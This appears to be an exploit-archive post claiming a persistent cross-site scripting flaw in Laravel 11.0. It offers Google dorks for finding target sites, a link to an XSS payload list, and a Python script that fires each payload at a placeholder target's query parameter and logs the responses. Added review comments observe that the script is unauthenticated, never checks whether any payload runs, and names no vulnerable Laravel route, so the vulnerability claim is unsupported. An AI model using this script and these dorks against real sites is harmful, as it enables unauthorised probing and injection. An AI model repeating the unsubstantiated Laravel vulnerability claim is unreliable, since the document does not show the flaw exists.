Laravel 11.0 Cross Site Scripting

/*!
- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 
- # Authenticated Persistent XSS
- # GOOGLE DORK: inurl:.com/?q=
- # GOOGLE DORK: Site:.com/?q=
- # DATE: 2024-12-01
- # SECURITY RESEARCHER:  E1.Coders
- # VENDOR: LARAVEL [https://laravel.com/]
- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt
*/
 
 
### -- [ Info: ] 
[i] A valid persistent XSS vulnerability was discovered in the Laravel version 11.0 website.
 
[i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=
 
 
### -- [ Impact: ] 
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
 
 
### -- [ EXPLOIT : ] 
 
 
import requests
 
# Base URL for every request; xss_attack() appends each payload string
# directly after "?q=". "TARGET.com" is the placeholder host as published.
url = "https://TARGET.com/?q="
 
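def read_payloads(filename="payloads.txt"):
    """Load the test strings from a text file, one per line.

    Args:
        filename: Path of the list to read; defaults to "payloads.txt".

    Returns:
        The lines with surrounding whitespace removed and blank lines
        skipped. An empty list (after printing an error) if the file does
        not exist.
    """
    try:
        with open(filename, "r") as f:
            # The published listing fused this statement and the `return`
            # below onto one line, which is a SyntaxError. Blank lines are
            # dropped so they do not turn into empty test strings.
            payloads = [line.strip() for line in f if line.strip()]
        return payloads
    except FileNotFoundError:
        print(f"Error: File '{filename}' not found.")
        return []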
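def xss_attack(url, payload):
    """Send one GET request to ``url + payload`` and return what came back.

    The payload is concatenated onto the URL exactly as given. Nothing in
    this function looks for the payload in the response body or renders the
    page, so the returned status code only shows that the server answered;
    it is not evidence that any script was stored or executed.

    Args:
        url: Base URL ending in the query parameter to fill.
        payload: String appended to ``url``.

    Returns:
        ``(status_code, response_text)`` on success, ``(None, None)`` if the
        request raised a ``requests`` exception (the error is printed).
    """
    full_url = url + payload
    try:
        # Bound the wait: requests.get() has no default timeout and can
        # block indefinitely on a host that never responds. A timeout is
        # raised as a RequestException subclass and handled below.
        response = requests.get(full_url, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        print(f"An error occurred during the request: {e}")
        return None, None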
 
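def main():
    """Request the target once per loaded string and log every response.

    Reads the list via read_payloads(), calls xss_attack() for each entry
    and writes payload, status code and raw response body to
    "attack_results.txt". Returns early when no strings were loaded.

    NOTE(review): the log records responses only. The script sends plain
    GET requests with no session or credentials and never checks whether a
    string was stored, reflected unescaped or executed, while the page
    header describes an authenticated persistent XSS and names no Laravel
    route, component or template. On the defending side, request values
    echoed with Blade's escaped ``{{ }}`` syntax are HTML-encoded; raw
    ``{!! !!}`` output of request data is the pattern to audit.
    """
    payloads = read_payloads()
    if not payloads:
        return

    # The published listing fused `results = []` and the `for` header onto
    # one line, which is a SyntaxError.
    results = []
    for payload in payloads:
        status_code, response_text = xss_attack(url, payload)
        if status_code:
            results.append({"payload": payload, "status_code": status_code, "response": response_text})

    # Write as UTF-8 so response bodies containing characters outside the
    # platform's default codec do not abort the run with UnicodeEncodeError.
    with open("attack_results.txt", "w", encoding="utf-8") as f:
        for result in results:
            f.write(f"Payload: {result['payload']}\n")
            f.write(f"Status Code: {result['status_code']}\n")
            f.write(f"Response: {result['response']}\n\n")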
 
# Script entry point: call main() only when the file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()
 
 
 
### -- [ Contacts: ] 
[+] E-Mail: [email protected]
 
[+] GitHub: @e1coders
